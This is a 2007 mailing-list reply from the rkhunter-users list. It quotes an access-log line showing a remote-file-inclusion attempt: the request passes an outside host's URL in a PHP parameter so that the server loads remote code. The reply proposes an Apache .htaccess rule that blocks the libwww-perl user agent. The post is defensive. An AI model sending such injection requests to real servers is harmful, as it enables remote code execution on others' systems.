Hallo, Johan, Du (johan.sundstrom) meintest am 03.12.07:
> IP Address of attacker: xxx.yyy.zzz.zzz > Type of attack: URL Injection -- attempt to inject / load files onto > the server via PHP/CGI vulnerabilities > Sample log report including date and time stamp: > Request: onlinesurfnshop.com xxx.yyy.zzz.zzz - - > [01/Dec/2007:16:59:21 -0800] "GET > /logos/banners//index.php?skin_file=http://www.n0n-clan.net//vwar/con > vert/test.txt? HTTP/1.1" 500 549 "-" "libwww-perl/5.805" - "-" I stop these nasty scripts with an entry in the ".htaccess" file in the apache "DocumentRoot": BrowserMatchNoCase "^libwww-perl" botnet order allow,deny allow from all deny from env=botnet You can choose another name than "botnet", you can add other definitions for this self defined environment variable(s). The "order/allow/deny" block first allows "all" and then blocks all defined requests. Without this entry the tries result in error level 404 (or 500) in "error_log". With this entry they produce error level 403. I have tried this entry on a website with about 2000 visits a day; over a month there was no "good" try with the Browser "libwww-perl". Only nasty scripts. Viele Gruesse! Helmut ------------------------------------------------------------------------- SF.Net email is sponsored by: The Future of Linux Business White Paper from Novell. From the desktop to the data center, Linux is going mainstream. Let it simplify your IT future. http://altfarm.mediaplex.com/ad/ck/8857-50307-18918-4 _______________________________________________ Rkhunter-users mailing list Rkhunter-users@lists.sourceforge.net https://lists.sourceforge.net/lists/listinfo/rkhunter-users
